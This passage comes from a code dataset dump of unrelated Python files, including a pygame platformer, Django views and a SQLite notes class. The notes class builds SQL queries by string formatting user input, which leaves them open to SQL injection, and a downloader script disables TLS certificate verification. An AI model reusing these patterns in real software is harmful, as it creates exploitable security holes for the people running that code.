sha1sum | cut -c 1-40 > $GASH_TMP/detteDuDuc\".format(detteDuDuc))\n getoutput(\"echo -n {} | sha1sum | cut -c 1-40 > $GASH_TMP/nbImpayes\".format(nbImpayes))\n\n\nif __name__ == '__main__':\n n = int(sys.argv[1]) if len(sys.argv) >= 2 else 100\n nbRoi = int(sys.argv[2]) if len(sys.argv) >= 3 else 10\n pp = float(sys.argv[3]) if len(sys.argv) >= 4 else 0.2\n gen(n, nbRoi, pp)\n","repo_name":"Theosakamg/GameShell","sub_path":"missions/33_pipe_1/bin/genParchemin.py","file_name":"genParchemin.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"fr","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"13808737429","text":"import sqlite3\nfrom dataclasses import dataclass\n\nclass Database:\n\n def __init__(self, file):\n self.conn = sqlite3.connect(file + '.db')\n self.conn.execute('CREATE TABLE IF NOT EXISTS note ( id INTEGER PRIMARY KEY, title TEXT DEFAULT NULL, content TEXT NOT NULL);')\n\n def add(self, note):\n self.conn.execute(\"INSERT INTO note (title, content) VALUES (%s, %s);\" % (\"'{}'\".format(note.title) if note.title else \"''\", \"'{}'\".format(note.content)))\n self.conn.commit()\n\n def get_all(self):\n notes = []\n cursor = self.conn.execute(\"SELECT id, title, content FROM note\")\n for linha in cursor:\n id = linha[0]\n title = linha[1]\n content = linha[2]\n notes.append(Note(id, title, content))\n return notes\n\n def update(self, entry):\n self.conn.execute(\"UPDATE note SET title = %s, content = '%s' WHERE id = '%s'\" % (\"'{}'\".format(entry.title) if entry.title else \"NULL\", entry.content, entry.id))\n self.conn.commit()\n\n def delete(self, note_id):\n self.conn.execute(\"DELETE FROM note WHERE id = %s\" % (note_id))\n self.conn.commit()\n\n@dataclass\nclass Note:\n id: int = None\n title: str = None\n content: str = ''\n\n\n\n# k = Note(5, content='asdf')\n# print(\"INSERT INTO note (title, content) VALUES (%s, %s);\" % (\"'{}'\".format(k.title) if k.title else \"'NULL'\", \"'{}'\".format(k.content)))\n","repo_name":"jpfa1406/ProjetoA","sub_path":"data/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25612699650","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 23 15:36:37 2019\n\n@author: Synophic\n\"\"\"\n\nimport jinja2\nimport csv\n\nconfig = 'config_template.j2'\n\n\n \nwith open(config) as e:\n output = e.read()\n\ncsv_file = 'peyto_onboarding.csv'\nwith open(csv_file) as f:\n read_csv = csv.DictReader(f)\n for bgp_var in read_csv:\n bgp_var\n t = jinja2.Template(output)\n print('#'*80)\n print(bgp_var['circle'] + ' PEYTO_IP ' + bgp_var['Loopback0_IP1'])\n print('#'*80)\n print(t.render(bgp_var))\n file = open('config_file.txt', 'a')\n file.write('#'*80 + \"\\n\")\n file.write(bgp_var['circle'] + ' PEYTO_IP ' + bgp_var['Loopback0_IP1'] + \"\\n\")\n file.write('#'*80 + \"\\n\")\n file.write(t.render(bgp_var))\n file.close()\n \n ","repo_name":"vikasvsnl/spyder-py3","sub_path":"Multiple_Peyto_Onboarding_config_creations.py","file_name":"Multiple_Peyto_Onboarding_config_creations.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15020881089","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST\nfrom rest_framework.decorators import api_view\nfrom django.db import transaction\n\nfrom .serializers import OrderSerializer\nfrom cart.cart import Cart\nfrom social.models import Address, Product, OrderItems, Order\nfrom .tasks import order_confirmation_mail\n\nimport random\n# Create your views here.\n\n@api_view(['POST'])\n@login_required\ndef order_create(request):\n cart=Cart(request)\n user=request.user\n order_id=str(random.randrange(1000))\n \n address=Address.objects.filter(user=user)[0]\n data={\"order_id\":order_id, \"address\":address.id, \"buyer\":user.id, \"price\":1}\n order_srz=OrderSerializer(data=data)\n with transaction.atomic():\n order_srz.is_valid(raise_exception=True)\n order=order_srz.save()\n for item in cart:\n OrderItems.objects.create(\n order=order,\n product=item['product'],\n price=item['price'],\n quantity=item['quantity']\n )\n order.price=order.get_total_cost()\n order.save()\n order_confirmation_mail.delay(order.id)\n cart.clear()\n return render(request, 'orders/order_placed.html', {'order': order})\n\n\n@login_required\ndef checkout_page(request):\n cart=Cart(request)\n addresses=Address.objects.filter(user=request.user)\n return render(request,'orders/checkout_page.html',{'cart': cart, 'addresses': addresses})\n \n ","repo_name":"ravi98/ecommerce_cart","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7123982645","text":"import httplib\nimport json\nimport logging\n\n__author__ = 'Nazzareno'\n\nfrom setting import static_variable\n\nclass Google_api_request:\n\n @staticmethod\n def request_place(latitude,longitude):\n\n #url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='\n url = '/maps/api/place/nearbysearch/json?location='\n url_place = url+latitude+\",\"+longitude\n url_radius = url_place+\"&radius=\"+str(static_variable.google_radius)\n url_type = url_radius+\"&types=\"+static_variable.google_types\n my_key = \"key=\" + static_variable.google_api_key\n\n conn = httplib.HTTPSConnection(\"maps.googleapis.com\")\n conn.request(\"GET\", url_type+\"&\"+my_key)\n r1 = conn.getresponse()\n\n response = json.loads(r1.read())\n\n if static_variable.DEBUG:\n logging.debug(\"Status request google place --> \"+response[\"status\"])\n if response[\"status\"] == \"OK\":\n temp_result = response[\"results\"]\n for temp in temp_result:\n #logging.debug(temp)\n if static_variable.DEBUG:\n if static_variable.DEBUG:\n logging.debug(str(temp[\"name\"])+\" is near\")\n for value in temp[\"types\"]:\n if value == \"parking\":\n return 2\n elif value == \"train_station\" or value == \"subway_station\":\n return 1\n return 1\n\n else:\n return 0","repo_name":"FamilyParking/Project","sub_path":"Server/Tool/google_api_request.py","file_name":"google_api_request.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"11961140520","text":"import random\nfrom colorama import init, Fore\n\nTRY = True\nwhile TRY:\n print(random.randint(1, 6))\n ROLL = input(Fore.BLUE + \"Want to roll the dice? (Yes/No): \")\n if ROLL.capitalize() == \"Yes\":\n continue\n else:\n break\nprint(\"Bye Bye Bye!!!\")\n","repo_name":"codingwithkien/Projects-Python-Programming","sub_path":"Dice_Rolling_Simulation/dice_rolling_simulation.py","file_name":"dice_rolling_simulation.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17659486001","text":"from sklearn.manifold import TSNE\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.decomposition import PCA\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.io as sio\r\n#import input_data\r\nimport heapq as hpq\r\nimport pickle as pk\r\n\r\niris = load_iris()\r\nwith open(r'tsnedatawf.pkl','rb') as f:\r\n data_dic = pk.load(f)\r\n#print(data_dic)\r\na = data_dic['h_conv1_rsp']\r\na2 = data_dic['h_conv2_rsp']\r\na3 = data_dic['h_conv3_rsp']\r\nwa = data_dic['wf']\r\nlabel = data_dic['label']\r\npos_idx = label[:,0]==1\r\nprint(len(wa[0]))\r\nneg_idx = label[:,0]==0\r\nprint(len(wa))\r\n#print(a)\r\n\r\npos_data3 = []\r\nneg_data3 = []\r\nhfc = 0\r\nwfc = 1\r\ndata_tmp = []\r\nwww = []\r\nww = []\r\nfor j in range(len(wa[0])):\r\n www = []\r\n for i in range(len(wa)):\r\n data_tmp.append(wa[i][j])\r\n if((i+1)%60 == 0):\r\n www.append(data_tmp)\r\n #print(data_tmp)\r\n data_tmp = []\r\n ww.append(www)\r\n\r\nfor i in range(len(a3)):\r\n data_tmp = []\r\n for j in range(len(a3[0])):\r\n for k in range(len(a3[0][0])):\r\n data_tmp.append(a3[i][j][k])\r\n if(pos_idx[i]):\r\n pos_data3.append(list(data_tmp))\r\n else:\r\n neg_data3.append(list(data_tmp))\r\npos_data3 = np.array(pos_data3)\r\nneg_data3 = np.array(neg_data3)\r\nww = np.array(ww)\r\n#print(len(a3[0]))\r\n#print(len(pos_data3))\r\nsio.savemat('save_w', {'w':ww})\r\n\r\n'''\r\nif(wfc == 1):\r\n wl1 = list(wa[0:116,0])\r\n wl2 = list(wa[0:116,1])\r\n wafa = list(wafa[0,:])\r\n #wl1 = [abs(i) for i in wl1]\r\n #wl2 = [abs(i) for i in wl2]\r\n large_index = hpq.nlargest(25, wl1)\r\n aaa = [wl1.index(large_index[i])+1 for i in range(25)]\r\n print(hpq.nlargest(25,aaa))\r\n\r\n\r\n large_index = hpq.nlargest(25, wafa)\r\n aaa = [wafa.index(large_index[i])+1 for i in range(25)]\r\n print(hpq.nlargest(25,aaa))\r\n#print(type(data_tmp[0]))\r\n#print(type(data))\r\ndata = np.array(data)\r\n#(type(data))\r\n#print(data.shape)\r\n\r\n#print(list(label[:,0]))\r\nX_tsne = TSNE(learning_rate=100).fit_transform(data_dic['x'])\r\nX_pca = PCA().fit_transform(data)\r\nprint(len(wl1))\r\nplt.scatter([i for i in range(116)],wl1)\r\nplt.show()\r\n'''\r\n'''\r\nplt.figure(figsize=(10, 5))\r\nplt.subplot(121)\r\nplt.scatter(X_tsne[:, 0], X_tsne[:, 1], c=list(label[:,0]))\r\nplt.show()\r\n'''","repo_name":"BingchengMao/Graph-Classification-CNN","sub_path":"tsneFR.py","file_name":"tsneFR.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13963928982","text":"#!/usr/bin/env python3\n\n\nfrom progress.bar import Bar\nimport requests\nimport urllib3\nimport time\n\n\n\nfrom downloader.dicts import *\n\n\n\nrequests.urllib3.disable_warnings()\ndef download(url, proxy, header):\n print(\" [+] Process started!\")\n bar = Bar (f\" [+] Files downloaded\",max=sum(ext_counts.values()), fill=\"█\")\n if proxy:\n if url.startswith(\"https://\"):\n proxy = {\"https\": proxy}\n elif url.startswith(\"http://\"):\n proxy = {\"http\": proxy}\n if header:\n header_name = header.split(\": \")[0]\n header_value = header.split(\": \")[1]\n headers = {header_name: header_value}\n else:\n headers = None\n for items in bigdata:\n print(\"\\r Working on it\", end=\"\"),bar.next()\n fille = items\n filename = fille.replace(\"/\", \"\")\n r = requests.get(url+fille, headers=headers, verify=False, proxies=proxy)\n if r.status_code != 200:\n failedones[fille] = failedones.get(fille, 0) + 1\n else:\n if filename[:1] == \".\":\n f = open(f\"files/{filename[1:]}\", \"wb\")\n f.write(r.content)\n f.close()\n else:\n f = open(f\"files/{filename}\", \"wb\")\n f.write(r.content)\n f.close() \n\n bar.finish()\n","repo_name":"S1ckAndTired/BucketList","sub_path":"downloader/writers.py","file_name":"writers.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7218154110","text":"# -*- coding: utf-8 -*-\nfrom email.policy import default\nimport os\nimport sys\n\nimport pkgutil\nimport importlib\n\n\ndef import_submodules(package_name: str) -> None:\n importlib.invalidate_caches()\n sys.path.append(\".\")\n\n module = importlib.import_module(package_name)\n path = getattr(module, \"__path__\", [])\n path_string = \"\" if not path else path[0]\n\n for module_finder, name, _ in pkgutil.walk_packages(path):\n if path_string and module_finder.path != path_string:\n continue\n subpackage = f\"{package_name}.{name}\"\n import_submodules(subpackage)\n\n\nimport_submodules(\"src\")\nfrom src.utils.params import Params\nfrom src.utils.args_parser import Subcommand, ArgumentParserWithDefaults\n\n\ndef main(subcommand_overrides={}):\n parser = ArgumentParserWithDefaults()\n\n subparsers = parser.add_subparsers(title=\"Commands\", metavar=\"\")\n\n subcommands = {\n \"preprocess\": Preprocess(),\n \"train\": Train(),\n \"hyp_train\": HyperparamsSearchTraining(),\n \"hyp_recon\": HyperparamsSearchReconstruction(),\n \"eval\": Evaluate(),\n \"eval_kw\": EvaluateKW(),\n \"vis_sim\": VisualizeSimilarItems(),\n \"export\": ExportModel(),\n **subcommand_overrides\n }\n\n for name, subcommand in subcommands.items():\n subparser = subcommand.add_subparser(name, subparsers)\n if name != \"configure\":\n subparser.add_argument(\"--include-package\",\n type=str,\n action=\"append\",\n default=[],\n help=\"additional packages to include\")\n\n args = parser.parse_args()\n if \"func\" in dir(args):\n for package_name in getattr(args, \"include_package\", ()):\n import_submodules(package_name)\n args.func(args)\n else:\n parser.print_help()\n\n\nclass Preprocess(Subcommand):\n def add_subparser(self, name, subparsers):\n description = \"Run data preprocess\"\n subparser = subparsers.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"config_path\", type=str,\n help=\"path to the json config file\")\n subparser.add_argument(\n \"-f\", \"--force\", action=\"store_true\",\n help=\"force override serialization dir\")\n\n subparser.set_defaults(func=preprocess)\n return subparser\n\n\ndef preprocess(args):\n from src.data.preprocess import main as func\n return func(args.config_path, args.force)\n\n\nclass Train(Subcommand):\n def add_subparser(self, name, parser):\n description = \"\"\"Train the specified model on the specified dataset\"\"\"\n subparser = parser.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"config_path\", type=str,\n help=\"path to parameter file describing the model to be trained\")\n subparser.add_argument(\n \"dataset_path\", type=str,\n help=\"path to the training dataset\")\n subparser.add_argument(\n \"-s\", \"--save_dir\", type=str, default=\"\",\n help=\"directory in which to save the model and its logs\")\n subparser.add_argument(\n \"-r\", \"--recover\", action=\"store_true\",\n help=\"recover training from the state in serialization_dir\")\n subparser.add_argument(\n \"-f\", \"--force\", action=\"store_true\",\n help=\"force override serialization dir\")\n\n subparser.set_defaults(func=train_model)\n\n return subparser\n\n\ndef train_model(args):\n from src.train import train as func\n return func(args.config_path, args.dataset_path, args.save_dir, args.recover, args.force)\n\n\nclass HyperparamsSearchTraining(Subcommand):\n def add_subparser(self, name, subparsers):\n description = \"Run hyperparams search for training\"\n subparser = subparsers.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"config_path\", type=str,\n help=\"path to the json config file\")\n subparser.add_argument(\n \"dataset_path\", type=str,\n help=\"path to the training dataset\")\n subparser.add_argument(\n \"-t\", \"--test_dataset_path\", type=str, default=None,\n help=\"path to evaluate dataset\")\n subparser.add_argument(\n \"-a\", \"--additional_dataset_path\", type=str, default=None,\n help=\"path to additional dataset\")\n subparser.add_argument(\n \"-n\", \"--num_trials\", type=int, default=100,\n help=\"number of trials to run\")\n subparser.add_argument(\n \"-f\", \"--force\", action=\"store_true\",\n help=\"force override serialization dir\")\n\n subparser.set_defaults(func=hyperparams_search_training)\n return subparser\n\n\ndef hyperparams_search_training(args):\n from src.train import hyperparams_search_training as func\n return func(args.config_path, args.dataset_path, args.test_dataset_path, args.additional_dataset_path,\n args.num_trials, args.force)\n\n\nclass HyperparamsSearchReconstruction(Subcommand):\n def add_subparser(self, name, subparsers):\n description = \"Run hyperparams search for reconstruction\"\n subparser = subparsers.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"config_path\", type=str,\n help=\"path to the json config file\")\n subparser.add_argument(\n \"checkpoint_dir\", type=str,\n help=\"path to the trained model checkpoint\")\n subparser.add_argument(\n \"test_dataset_path\", type=str,\n help=\"path to the test dataset\")\n subparser.add_argument(\n \"additional_dataset_path\", type=str,\n help=\"path to additional dataset\")\n subparser.add_argument(\n \"-n\", \"--num_trials\", type=int, default=100,\n help=\"number of trials to run\")\n\n subparser.set_defaults(func=hyperparams_search_training)\n return subparser\n\n\ndef hyperparams_search_training(args):\n from src.train import hyperparams_search_reconstruction as func\n return func(args.config_path, args.checkpoint_dir, args.test_dataset_path, args.additional_dataset_path,\n args.num_trials)\n\n\nclass Evaluate(Subcommand):\n def add_subparser(self, name, subparsers):\n description = \"Run evaluation\"\n subparser = subparsers.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"checkpoint_path\", type=str,\n help=(\"path to the model checkpoint\"))\n subparser.add_argument(\n \"-d\", \"--test_dataset_path\", type=str, default=None,\n help=\"path to evaluate dataset\")\n subparser.set_defaults(func=evaluate)\n return subparser\n\n\ndef evaluate(args):\n from src.train import test as func\n return func(args.checkpoint_path, args.test_dataset_path)\n\n\nclass EvaluateKW(Subcommand):\n def add_subparser(self, name, subparsers):\n description = \"Run evaluation on kw\"\n subparser = subparsers.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"checkpoint_path\", type=str,\n help=(\"path to the model checkpoint\"))\n subparser.add_argument(\n \"-d\", \"--test_dataset_path\", type=str, default=None,\n help=\"path to evaluate dataset\")\n subparser.add_argument(\n \"-a\", \"--additional_dataset_path\", type=str, default=None,\n help=\"path to additional dataset\")\n subparser.add_argument(\n \"-c\", \"--reconstruction_config\", type=str, default=None,\n help=\"path to the reconstruction config\")\n subparser.set_defaults(func=evaluate_kw)\n return subparser\n\n\ndef evaluate_kw(args):\n from src.train import test_keyword as func\n return func(args.checkpoint_path, args.test_dataset_path, args.additional_dataset_path,\n args.reconstruction_config)\n\n\nclass VisualizeSimilarItems(Subcommand):\n def add_subparser(self, name, parser):\n description = \"\"\"Visualize similar item embeddings\"\"\"\n subparser = parser.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"checkpoint_path\", type=str, help=\"path to model checkpoint\")\n subparser.add_argument(\n \"-f\", \"--force\", action=\"store_true\", help=\"override the ann tree\")\n subparser.set_defaults(func=visualize_similar_items)\n\n return subparser\n\n\ndef visualize_similar_items(args):\n from src.visualization.visualize_embeddings import get_similar_items as func\n return func(args.checkpoint_path, args.force)\n\n\nclass ExportModel(Subcommand):\n def add_subparser(self, name, parser):\n description = \"\"\"Export model for serving\"\"\"\n subparser = parser.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"checkpoint_path\", type=str, help=\"path to model checkpoint\")\n subparser.add_argument(\n \"-o\", \"--output_dir\", type=str, help=\"path to output dir\")\n subparser.set_defaults(func=export_model)\n\n return subparser\n\n\ndef export_model(args):\n raise NotImplementedError()\n\n\ndef run():\n main()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"thanhtcptit/deep-mf","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40552260193","text":"import pygame\nimport random\nfrom pixeljump.projectile import Projectile\nfrom pixeljump.settings import load_settings\nfrom pixeljump.assets import get_sprite_image, get_music\nfrom pixeljump.animations import load_animation, change_action\nfrom pixeljump.menu import pause_screen, win_screen1, win_screen2, win_screen3\nfrom pixeljump.die import Fade\nfrom pixeljump.particles import RocketParticles\n\n\nsettings = load_settings()\n\nTILE_SIZE = settings[\"window\"][\"tile_size\"]\nPLAYER_COLOR = settings[\"colors\"][\"player\"]\nFPS = settings[\"window\"][\"fps\"]\nPLAYER_HORIZONTAL_VEL = settings[\"player\"][\"horizontal_velocity\"]\nPLAYER_VERTICAL_VEL = settings[\"player\"][\"vertical_velocity\"]\nGRAVITY = settings[\"player\"][\"gravity\"]\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(\n self,\n position: tuple[int, int],\n *groups: pygame.sprite.Group,\n act: int,\n target: pygame.sprite.Sprite,\n collision_sprites: pygame.sprite.Group,\n visible_sprites: pygame.sprite.Group,\n active_sprites: pygame.sprite.Group,\n enemy_sprites: pygame.sprite.Group,\n can_shoot: bool = False\n ):\n super().__init__(*groups)\n self.health = 3\n self.heart_image = get_sprite_image(\"heart\", (TILE_SIZE, TILE_SIZE))\n self.image = get_sprite_image(\"KNIGHT\", (TILE_SIZE, TILE_SIZE), convert=False)\n self.rect = self.image.get_rect(center=position)\n self.mask = pygame.mask.from_surface(self.image)\n self.velocity = pygame.Vector2()\n self.enemy_sprites = enemy_sprites\n self.collision_sprites = collision_sprites\n self.visible_sprites = visible_sprites\n self.active_sprites = active_sprites\n self.target = target\n self.can_jump = True\n self.can_double_jump = True\n self.muted = False\n self.die = pygame.sprite.Group(Fade())\n self.dead = False\n self.orig_pos = position\n self.can_rocket = False\n self.rocket_timer = 70\n self.act = act\n self.rocket_acceleration = 0\n self.can_shoot = can_shoot\n\n # For animations\n self.animation_images: dict[str, pygame.Surface] = {}\n self.animation_database = {\n \"idle\": load_animation(\"idle\", [7, 7, 40], self.animation_images),\n \"running\": load_animation(\n \"running\", [7, 7, 7, 7, 7, 7, 7, 7], self.animation_images\n ),\n \"jumping\": load_animation(\"jumping\", [7], self.animation_images),\n }\n self.player_action = \"idle\"\n self.player_frame = 0\n self.player_flip = False\n\n # For audio\n self.jump_sound = get_music(\"jump.wav\")\n self.step_sound = [\n get_music(\"step0.wav\"),\n get_music(\"step1.wav\"),\n ]\n self.step_sound_timer = 0\n self.step_sound[0].set_volume(0.5)\n self.step_sound[1].set_volume(0.5)\n\n self.death_music = get_music(\"ded.wav\")\n self.death_music.set_volume(0.2)\n\n self.pause_in_sound = get_music(\"pause_in.wav\")\n self.falling_sound = get_music(\"falling.wav\")\n\n self.rocket_sound = get_music(\"rocket.wav\")\n self.rocket_sound_timer = 10\n\n self.end_act = False\n\n self.got_hit_cd = 0\n\n self.gravity = GRAVITY\n\n self.shoot_sound = get_music(\"projectile_player.wav\")\n\n def got_hit(self) -> bool:\n if self.got_hit_cd <= 0:\n self.health -= 1\n self.got_hit_cd = 2 * FPS\n return True\n return False\n\n def input(self):\n if self.dead:\n return\n\n if self.step_sound_timer > 0:\n self.step_sound_timer -= 1\n\n if self.rocket_sound_timer > 0:\n self.rocket_sound_timer -= 1\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_a]:\n self.velocity.x = -PLAYER_HORIZONTAL_VEL\n elif keys[pygame.K_d]:\n self.velocity.x = PLAYER_HORIZONTAL_VEL\n else:\n self.velocity.x = 0\n\n if keys[pygame.K_SPACE]:\n if self.can_rocket and self.rocket_timer > 0:\n if self.rocket_sound_timer == 0:\n self.rocket_sound.play()\n self.rocket_sound_timer = 10\n self.rocket_acceleration -= 0.4\n self.velocity.y += self.rocket_acceleration\n if self.velocity.y < -10:\n self.velocity.y = -10\n self.rocket_timer -= 1\n RocketParticles(\n (self.rect.bottomleft[0] + 10, self.rect.bottomleft[1] - 10),\n (random.randint(0, 20) / 10 - 2, random.randint(0, 20) / 10),\n self.visible_sprites,\n self.active_sprites,\n )\n\n RocketParticles(\n (self.rect.bottomright[0] - 20, self.rect.bottomright[1] - 10),\n (random.randint(0, 20) / 10, random.randint(0, 20) / 10),\n self.visible_sprites,\n self.active_sprites,\n )\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n if self.can_jump:\n self.velocity.y = -PLAYER_VERTICAL_VEL\n self.can_jump = False\n self.jump_sound.play()\n elif self.can_double_jump:\n self.velocity.y = -PLAYER_VERTICAL_VEL\n self.can_double_jump = False\n self.jump_sound.play()\n elif (\n not self.can_double_jump and not self.can_jump and self.act == 2\n ):\n self.can_rocket = True\n self.rocket_acceleration = 0\n if event.key == pygame.K_ESCAPE:\n self.pause_in_sound.play()\n pause_screen()\n if event.key == pygame.K_m:\n self.toggle_mute()\n if self.can_shoot and event.key == pygame.K_p:\n self.shoot_sound.play()\n if not self.player_flip:\n Projectile(\n (self.rect.centerx, self.rect.centery - 10),\n self.visible_sprites,\n self.active_sprites,\n direction=\"left\" if self.player_flip else \"right\",\n collision_sprites=self.collision_sprites,\n enemy_sprites=self.enemy_sprites,\n )\n else:\n Projectile(\n (self.rect.centerx - 64, self.rect.centery - 10),\n self.visible_sprites,\n self.active_sprites,\n direction=\"left\" if self.player_flip else \"right\",\n collision_sprites=self.collision_sprites,\n enemy_sprites=self.enemy_sprites,\n )\n if event.type == pygame.QUIT:\n pygame.quit()\n quit(0)\n\n def toggle_mute(self) -> None:\n if not self.muted:\n self.step_sound[0].set_volume(0)\n self.step_sound[1].set_volume(0)\n self.jump_sound.set_volume(0)\n pygame.mixer.music.pause()\n self.muted = True\n else:\n self.step_sound[0].set_volume(0.5)\n self.step_sound[0].set_volume(0.5)\n self.jump_sound.set_volume(1)\n pygame.mixer.music.unpause()\n self.muted = False\n\n def check_win(self) -> None:\n assert self.target.rect is not None\n if self.rect.colliderect(self.target.rect):\n self.target.win_sound.play()\n self.end_act = True\n if self.act == 1:\n win_screen1()\n elif self.act == 2 and not self.can_shoot:\n win_screen2()\n elif self.act == 2 and self.can_shoot:\n win_screen3()\n\n def animation(self):\n if self.velocity.x > 0:\n self.player_action, self.player_frame = change_action(\n self.player_action, self.player_frame, \"running\"\n )\n self.player_flip = False\n\n if self.velocity.x == 0 and self.velocity.y == 0:\n self.player_action, self.player_frame = change_action(\n self.player_action, self.player_frame, \"idle\"\n )\n\n if self.velocity.x < 0:\n self.player_action, self.player_frame = change_action(\n self.player_action, self.player_frame, \"running\"\n )\n self.player_flip = True\n\n if self.can_rocket:\n self.player_action, self.player_frame = change_action(\n self.player_action, self.player_frame, \"jumping\"\n )\n\n def animating_image(self):\n self.player_frame += 1\n if self.player_frame >= len(self.animation_database[self.player_action]):\n self.player_frame = 0\n player_img_id = self.animation_database[self.player_action][self.player_frame]\n player_image = self.animation_images[player_img_id]\n self.image = pygame.transform.flip(player_image, self.player_flip, False)\n self.mask = pygame.mask.from_surface(self.image)\n\n def horizontal_collisions(self):\n for sprite in self.collision_sprites.sprites():\n if self.rect is not None and sprite.rect is not None:\n if sprite.rect.colliderect(self.rect):\n if self.velocity.x < 0:\n self.rect.left = sprite.rect.right\n if self.velocity.x > 0:\n self.rect.right = sprite.rect.left\n\n def vertical_collisions(self):\n for sprite in self.collision_sprites.sprites():\n if self.rect is not None and sprite.rect is not None:\n if sprite.rect.colliderect(self.rect):\n if self.velocity.y < 0:\n self.rect.top = sprite.rect.bottom\n self.velocity.y = 0\n if self.velocity.y > 0:\n self.rect.bottom = sprite.rect.top\n self.velocity.y = 0\n self.can_jump = True\n self.can_double_jump = True\n self.can_rocket = False\n self.rocket_timer = 70\n self.rocket_acceleration = 0\n if self.velocity.x != 0:\n if self.step_sound_timer == 0:\n self.step_sound_timer = 30\n random.choice(self.step_sound).play()\n\n def apply_gravity(self):\n self.velocity.y += self.gravity\n self.rect.y += self.velocity.y\n\n def check_alive(self):\n if self.rect.y > pygame.display.get_window_size()[1] * 2:\n self.falling_sound.play()\n self.player_die()\n\n def player_die(self) -> None:\n curr = pygame.time.get_ticks()\n end = curr + (3 * 1000)\n self.dead = True\n self.velocity = pygame.Vector2((0, 0))\n window = pygame.display.get_surface()\n font = pygame.font.SysFont(\"comicsans\", 50, bold=True)\n text = font.render(\"YOU DIED\", True, pygame.Color(\"red\"))\n pygame.mixer.music.stop()\n self.death_music.play()\n clock = pygame.time.Clock()\n while curr < end:\n self.die.update()\n self.die.draw(window)\n window.blit(\n text,\n (\n window.get_width() // 2 - text.get_width() // 2,\n window.get_height() // 2 - text.get_height() // 2,\n ),\n )\n curr = pygame.time.get_ticks()\n pygame.display.update()\n clock.tick(10)\n self.death_music.stop()\n self.kill()\n # self.dead = False\n # self.health = 3\n # self.rect.topleft = self.orig_pos\n # pygame.mixer.music.play()\n\n def draw_health(self) -> None:\n window = pygame.display.get_surface()\n for i in range(self.health):\n window.blit(\n self.heart_image,\n (window.get_width() - ((i + 1) * TILE_SIZE * 1.15), 10),\n )\n\n def update(self):\n self.input()\n self.animation()\n self.animating_image()\n self.rect.x += int(self.velocity.x)\n self.horizontal_collisions()\n self.apply_gravity()\n self.vertical_collisions()\n # self.check_alive()\n self.check_win()\n if self.got_hit_cd > 0:\n self.got_hit_cd -= 1\n self.draw_health()\n","repo_name":"WilsonOh/Orbital21-22-PixelJump-5215","sub_path":"src/pixeljump/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43409285040","text":"import logging\n\nfrom django.core.cache import caches\n\nfrom rest_framework import mixins, viewsets\nfrom rest_framework.serializers import ValidationError\nfrom rest_framework.settings import api_settings\nfrom vng_api_common.permissions import AuthScopesRequired\nfrom vng_api_common.viewsets import CheckQueryParamsMixin\n\nfrom kic.datamodel.models import (\n ContactMoment,\n Klant,\n ObjectContactMoment,\n VerzoekContactMoment,\n VerzoekInformatieObject,\n VerzoekProduct,\n)\nfrom kic.datamodel.models.core import ObjectVerzoek, Verzoek\n\nfrom .filters import (\n ObjectContactMomentFilter,\n ObjectVerzoekFilter,\n VerzoekContactMomentFilter,\n VerzoekInformatieObjectFilter,\n VerzoekProductFilter,\n)\nfrom .scopes import (\n SCOPE_KLANTEN_AANMAKEN,\n SCOPE_KLANTEN_ALLES_LEZEN,\n SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n SCOPE_KLANTEN_BIJWERKEN,\n)\nfrom .serializers import (\n ContactMomentSerializer,\n KlantSerializer,\n ObjectContactMomentSerializer,\n ObjectVerzoekSerializer,\n VerzoekContactMomentSerializer,\n VerzoekInformatieObjectSerializer,\n VerzoekProductSerializer,\n VerzoekSerializer,\n)\nfrom .validators import (\n ObjectContactMomentDestroyValidator,\n ObjectVerzoekDestroyValidator,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass KlantViewSet(viewsets.ModelViewSet):\n \"\"\"\n Opvragen en bewerken van KLANTen.\n\n Een KLANT is een eenvoudige weergave van een NATUURLIJK PERSOON of\n VESTIGING waarbij het gaat om niet geverifieerde gegevens. 